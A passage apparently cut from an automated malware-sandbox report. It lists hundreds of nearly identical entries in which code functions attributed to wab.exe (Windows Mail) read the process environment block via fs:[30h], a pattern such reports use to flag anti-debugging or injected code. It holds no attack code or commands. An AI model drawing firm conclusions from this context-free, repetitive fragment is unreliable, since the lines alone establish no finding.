        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246EE5E7 mov eax, dword ptr fs:[00000030h]12_2_246EE5E7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246EE5E7 mov eax, dword ptr fs:[00000030h]12_2_246EE5E7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246EE5E7 mov eax, dword ptr fs:[00000030h]12_2_246EE5E7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246EE5E7 mov eax, dword ptr fs:[00000030h]12_2_246EE5E7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246EE5E7 mov eax, dword ptr fs:[00000030h]12_2_246EE5E7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C25E0 mov eax, dword ptr fs:[00000030h]12_2_246C25E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246E15F4 mov eax, dword ptr fs:[00000030h]12_2_246E15F4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246E15F4 mov eax, dword ptr fs:[00000030h]12_2_246E15F4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246E15F4 mov eax, dword ptr fs:[00000030h]12_2_246E15F4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246E15F4 mov eax, dword ptr fs:[00000030h]12_2_246E15F4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246E15F4 mov eax, dword ptr fs:[00000030h]12_2_246E15F4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246E15F4 mov eax, dword ptr fs:[00000030h]12_2_246E15F4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246FE5CF mov eax, dword ptr fs:[00000030h]12_2_246FE5CF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246FE5CF mov eax, dword ptr fs:[00000030h]12_2_246FE5CF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247935D7 mov eax, dword ptr fs:[00000030h]12_2_247935D7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247935D7 mov eax, dword ptr fs:[00000030h]12_2_247935D7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247935D7 mov eax, dword ptr fs:[00000030h]12_2_247935D7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F55C0 mov eax, dword ptr fs:[00000030h]12_2_246F55C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247955C9 mov eax, dword ptr fs:[00000030h]12_2_247955C9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246E95DA mov eax, dword ptr fs:[00000030h]12_2_246E95DA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C65D0 mov eax, dword ptr fs:[00000030h]12_2_246C65D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246FA5D0 mov eax, dword ptr fs:[00000030h]12_2_246FA5D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246FA5D0 mov eax, dword ptr fs:[00000030h]12_2_246FA5D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246E15A9 mov eax, dword ptr fs:[00000030h]12_2_246E15A9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246E15A9 mov eax, dword ptr fs:[00000030h]12_2_246E15A9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246E15A9 mov eax, dword ptr fs:[00000030h]12_2_246E15A9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246E15A9 mov eax, dword ptr fs:[00000030h]12_2_246E15A9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246E15A9 mov eax, dword ptr fs:[00000030h]12_2_246E15A9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2477F5BE mov eax, dword ptr fs:[00000030h]12_2_2477F5BE
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247535BA mov eax, dword ptr fs:[00000030h]12_2_247535BA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247535BA mov eax, dword ptr fs:[00000030h]12_2_247535BA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247535BA mov eax, dword ptr fs:[00000030h]12_2_247535BA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247535BA mov eax, dword ptr fs:[00000030h]12_2_247535BA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247405A7 mov eax, dword ptr fs:[00000030h]12_2_247405A7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247405A7 mov eax, dword ptr fs:[00000030h]12_2_247405A7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247405A7 mov eax, dword ptr fs:[00000030h]12_2_247405A7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246EF5B0 mov eax, dword ptr fs:[00000030h]12_2_246EF5B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246EF5B0 mov eax, dword ptr fs:[00000030h]12_2_246EF5B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246EF5B0 mov eax, dword ptr fs:[00000030h]12_2_246EF5B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246EF5B0 mov eax, dword ptr fs:[00000030h]12_2_246EF5B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246EF5B0 mov eax, dword ptr fs:[00000030h]12_2_246EF5B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246EF5B0 mov eax, dword ptr fs:[00000030h]12_2_246EF5B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246EF5B0 mov eax, dword ptr fs:[00000030h]12_2_246EF5B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246EF5B0 mov eax, dword ptr fs:[00000030h]12_2_246EF5B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246EF5B0 mov eax, dword ptr fs:[00000030h]12_2_246EF5B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246E45B1 mov eax, dword ptr fs:[00000030h]12_2_246E45B1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246E45B1 mov eax, dword ptr fs:[00000030h]12_2_246E45B1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2474B594 mov eax, dword ptr fs:[00000030h]12_2_2474B594
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2474B594 mov eax, dword ptr fs:[00000030h]12_2_2474B594
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246B758F mov eax, dword ptr fs:[00000030h]12_2_246B758F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246B758F mov eax, dword ptr fs:[00000030h]12_2_246B758F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246B758F mov eax, dword ptr fs:[00000030h]12_2_246B758F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F4588 mov eax, dword ptr fs:[00000030h]12_2_246F4588
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C2582 mov eax, dword ptr fs:[00000030h]12_2_246C2582
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C2582 mov ecx, dword ptr fs:[00000030h]12_2_246C2582
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246FE59C mov eax, dword ptr fs:[00000030h]12_2_246FE59C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246FA660 mov eax, dword ptr fs:[00000030h]12_2_246FA660
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246FA660 mov eax, dword ptr fs:[00000030h]12_2_246FA660
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F9660 mov eax, dword ptr fs:[00000030h]12_2_246F9660
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F9660 mov eax, dword ptr fs:[00000030h]12_2_246F9660
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2478866E mov eax, dword ptr fs:[00000030h]12_2_2478866E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2478866E mov eax, dword ptr fs:[00000030h]12_2_2478866E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F2674 mov eax, dword ptr fs:[00000030h]12_2_246F2674
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246DC640 mov eax, dword ptr fs:[00000030h]12_2_246DC640
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C262C mov eax, dword ptr fs:[00000030h]12_2_246C262C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246DE627 mov eax, dword ptr fs:[00000030h]12_2_246DE627
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF626 mov eax, dword ptr fs:[00000030h]12_2_246BF626
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF626 mov eax, dword ptr fs:[00000030h]12_2_246BF626
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF626 mov eax, dword ptr fs:[00000030h]12_2_246BF626
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF626 mov eax, dword ptr fs:[00000030h]12_2_246BF626
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF626 mov eax, dword ptr fs:[00000030h]12_2_246BF626
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF626 mov eax, dword ptr fs:[00000030h]12_2_246BF626
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF626 mov eax, dword ptr fs:[00000030h]12_2_246BF626
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF626 mov eax, dword ptr fs:[00000030h]12_2_246BF626
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF626 mov eax, dword ptr fs:[00000030h]12_2_246BF626
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F6620 mov eax, dword ptr fs:[00000030h]12_2_246F6620
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24795636 mov eax, dword ptr fs:[00000030h]12_2_24795636
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F8620 mov eax, dword ptr fs:[00000030h]12_2_246F8620
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D260B mov eax, dword ptr fs:[00000030h]12_2_246D260B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D260B mov eax, dword ptr fs:[00000030h]12_2_246D260B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D260B mov eax, dword ptr fs:[00000030h]12_2_246D260B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D260B mov eax, dword ptr fs:[00000030h]12_2_246D260B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D260B mov eax, dword ptr fs:[00000030h]12_2_246D260B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D260B mov eax, dword ptr fs:[00000030h]12_2_246D260B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D260B mov eax, dword ptr fs:[00000030h]12_2_246D260B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F1607 mov eax, dword ptr fs:[00000030h]12_2_246F1607
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702619 mov eax, dword ptr fs:[00000030h]12_2_24702619
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246FF603 mov eax, dword ptr fs:[00000030h]12_2_246FF603
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2473E609 mov eax, dword ptr fs:[00000030h]12_2_2473E609
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C3616 mov eax, dword ptr fs:[00000030h]12_2_246C3616
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C3616 mov eax, dword ptr fs:[00000030h]12_2_246C3616
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F36EF mov eax, dword ptr fs:[00000030h]12_2_246F36EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2473E6F2 mov eax, dword ptr fs:[00000030h]12_2_2473E6F2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2473E6F2 mov eax, dword ptr fs:[00000030h]12_2_2473E6F2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2473E6F2 mov eax, dword ptr fs:[00000030h]12_2_2473E6F2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2473E6F2 mov eax, dword ptr fs:[00000030h]12_2_2473E6F2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247406F1 mov eax, dword ptr fs:[00000030h]12_2_247406F1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247406F1 mov eax, dword ptr fs:[00000030h]12_2_247406F1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2477D6F0 mov eax, dword ptr fs:[00000030h]12_2_2477D6F0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246ED6E0 mov eax, dword ptr fs:[00000030h]12_2_246ED6E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246ED6E0 mov eax, dword ptr fs:[00000030h]12_2_246ED6E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247536EE mov eax, dword ptr fs:[00000030h]12_2_247536EE
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247536EE mov eax, dword ptr fs:[00000030h]12_2_247536EE
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247536EE mov eax, dword ptr fs:[00000030h]12_2_247536EE
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247536EE mov eax, dword ptr fs:[00000030h]12_2_247536EE
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247536EE mov eax, dword ptr fs:[00000030h]12_2_247536EE
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247536EE mov eax, dword ptr fs:[00000030h]12_2_247536EE
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F16CF mov eax, dword ptr fs:[00000030h]12_2_246F16CF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246FA6C7 mov ebx, dword ptr fs:[00000030h]12_2_246FA6C7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246FA6C7 mov eax, dword ptr fs:[00000030h]12_2_246FA6C7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246CB6C0 mov eax, dword ptr fs:[00000030h]12_2_246CB6C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246CB6C0 mov eax, dword ptr fs:[00000030h]12_2_246CB6C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246CB6C0 mov eax, dword ptr fs:[00000030h]12_2_246CB6C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246CB6C0 mov eax, dword ptr fs:[00000030h]12_2_246CB6C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246CB6C0 mov eax, dword ptr fs:[00000030h]12_2_246CB6C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246CB6C0 mov eax, dword ptr fs:[00000030h]12_2_246CB6C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2477F6C7 mov eax, dword ptr fs:[00000030h]12_2_2477F6C7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247816CC mov eax, dword ptr fs:[00000030h]12_2_247816CC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247816CC mov eax, dword ptr fs:[00000030h]12_2_247816CC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247816CC mov eax, dword ptr fs:[00000030h]12_2_247816CC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247816CC mov eax, dword ptr fs:[00000030h]12_2_247816CC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BD6AA mov eax, dword ptr fs:[00000030h]12_2_246BD6AA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BD6AA mov eax, dword ptr fs:[00000030h]12_2_246BD6AA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246FC6A6 mov eax, dword ptr fs:[00000030h]12_2_246FC6A6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246B76B2 mov eax, dword ptr fs:[00000030h]12_2_246B76B2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246B76B2 mov eax, dword ptr fs:[00000030h]12_2_246B76B2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246B76B2 mov eax, dword ptr fs:[00000030h]12_2_246B76B2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F66B0 mov eax, dword ptr fs:[00000030h]12_2_246F66B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2474368C mov eax, dword ptr fs:[00000030h]12_2_2474368C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2474368C mov eax, dword ptr fs:[00000030h]12_2_2474368C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2474368C mov eax, dword ptr fs:[00000030h]12_2_2474368C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2474368C mov eax, dword ptr fs:[00000030h]12_2_2474368C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C4690 mov eax, dword ptr fs:[00000030h]12_2_246C4690
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C4690 mov eax, dword ptr fs:[00000030h]12_2_246C4690
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BB765 mov eax, dword ptr fs:[00000030h]12_2_246BB765
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BB765 mov eax, dword ptr fs:[00000030h]12_2_246BB765
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BB765 mov eax, dword ptr fs:[00000030h]12_2_246BB765
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BB765 mov eax, dword ptr fs:[00000030h]12_2_246BB765
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C8770 mov eax, dword ptr fs:[00000030h]12_2_246C8770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D0770 mov eax, dword ptr fs:[00000030h]12_2_246D0770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D0770 mov eax, dword ptr fs:[00000030h]12_2_246D0770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D0770 mov eax, dword ptr fs:[00000030h]12_2_246D0770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D0770 mov eax, dword ptr fs:[00000030h]12_2_246D0770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D0770 mov eax, dword ptr fs:[00000030h]12_2_246D0770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D0770 mov eax, dword ptr fs:[00000030h]12_2_246D0770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D0770 mov eax, dword ptr fs:[00000030h]12_2_246D0770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D0770 mov eax, dword ptr fs:[00000030h]12_2_246D0770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D0770 mov eax, dword ptr fs:[00000030h]12_2_246D0770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D0770 mov eax, dword ptr fs:[00000030h]12_2_246D0770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D0770 mov eax, dword ptr fs:[00000030h]12_2_246D0770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D0770 mov eax, dword ptr fs:[00000030h]12_2_246D0770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702750 mov eax, dword ptr fs:[00000030h]12_2_24702750
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702750 mov eax, dword ptr fs:[00000030h]12_2_24702750
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24744755 mov eax, dword ptr fs:[00000030h]12_2_24744755
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F674D mov esi, dword ptr fs:[00000030h]12_2_246F674D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F674D mov eax, dword ptr fs:[00000030h]12_2_246F674D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F674D mov eax, dword ptr fs:[00000030h]12_2_246F674D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D3740 mov eax, dword ptr fs:[00000030h]12_2_246D3740
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D3740 mov eax, dword ptr fs:[00000030h]12_2_246D3740
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D3740 mov eax, dword ptr fs:[00000030h]12_2_246D3740
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24793749 mov eax, dword ptr fs:[00000030h]12_2_24793749
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C0750 mov eax, dword ptr fs:[00000030h]12_2_246C0750
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2473C730 mov eax, dword ptr fs:[00000030h]12_2_2473C730
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2479B73C mov eax, dword ptr fs:[00000030h]12_2_2479B73C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2479B73C mov eax, dword ptr fs:[00000030h]12_2_2479B73C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2479B73C mov eax, dword ptr fs:[00000030h]12_2_2479B73C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2479B73C mov eax, dword ptr fs:[00000030h]12_2_2479B73C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C3720 mov eax, dword ptr fs:[00000030h]12_2_246C3720
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246DF720 mov eax, dword ptr fs:[00000030h]12_2_246DF720
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246DF720 mov eax, dword ptr fs:[00000030h]12_2_246DF720
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246DF720 mov eax, dword ptr fs:[00000030h]12_2_246DF720
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246FC720 mov eax, dword ptr fs:[00000030h]12_2_246FC720
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246FC720 mov eax, dword ptr fs:[00000030h]12_2_246FC720
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F273C mov eax, dword ptr fs:[00000030h]12_2_246F273C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F273C mov ecx, dword ptr fs:[00000030h]12_2_246F273C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F273C mov eax, dword ptr fs:[00000030h]12_2_246F273C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2478972B mov eax, dword ptr fs:[00000030h]12_2_2478972B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C973A mov eax, dword ptr fs:[00000030h]12_2_246C973A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C973A mov eax, dword ptr fs:[00000030h]12_2_246C973A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2477F72E mov eax, dword ptr fs:[00000030h]12_2_2477F72E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246B9730 mov eax, dword ptr fs:[00000030h]12_2_246B9730
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246B9730 mov eax, dword ptr fs:[00000030h]12_2_246B9730
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F5734 mov eax, dword ptr fs:[00000030h]12_2_246F5734
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C5702 mov eax, dword ptr fs:[00000030h]12_2_246C5702
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C5702 mov eax, dword ptr fs:[00000030h]12_2_246C5702
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C7703 mov eax, dword ptr fs:[00000030h]12_2_246C7703
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246FC700 mov eax, dword ptr fs:[00000030h]12_2_246FC700
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246FF71F mov eax, dword ptr fs:[00000030h]12_2_246FF71F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246FF71F mov eax, dword ptr fs:[00000030h]12_2_246FF71F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C0710 mov eax, dword ptr fs:[00000030h]12_2_246C0710
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F0710 mov eax, dword ptr fs:[00000030h]12_2_246F0710
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246E27ED mov eax, dword ptr fs:[00000030h]12_2_246E27ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246E27ED mov eax, dword ptr fs:[00000030h]12_2_246E27ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246E27ED mov eax, dword ptr fs:[00000030h]12_2_246E27ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246CD7E0 mov ecx, dword ptr fs:[00000030h]12_2_246CD7E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C47FB mov eax, dword ptr fs:[00000030h]12_2_246C47FB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C47FB mov eax, dword ptr fs:[00000030h]12_2_246C47FB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246CC7C0 mov eax, dword ptr fs:[00000030h]12_2_246CC7C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C57C0 mov eax, dword ptr fs:[00000030h]12_2_246C57C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C57C0 mov eax, dword ptr fs:[00000030h]12_2_246C57C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C57C0 mov eax, dword ptr fs:[00000030h]12_2_246C57C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C07AF mov eax, dword ptr fs:[00000030h]12_2_246C07AF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247937B6 mov eax, dword ptr fs:[00000030h]12_2_247937B6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF7BA mov eax, dword ptr fs:[00000030h]12_2_246BF7BA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF7BA mov eax, dword ptr fs:[00000030h]12_2_246BF7BA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF7BA mov eax, dword ptr fs:[00000030h]12_2_246BF7BA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF7BA mov eax, dword ptr fs:[00000030h]12_2_246BF7BA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF7BA mov eax, dword ptr fs:[00000030h]12_2_246BF7BA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF7BA mov eax, dword ptr fs:[00000030h]12_2_246BF7BA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF7BA mov eax, dword ptr fs:[00000030h]12_2_246BF7BA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF7BA mov eax, dword ptr fs:[00000030h]12_2_246BF7BA
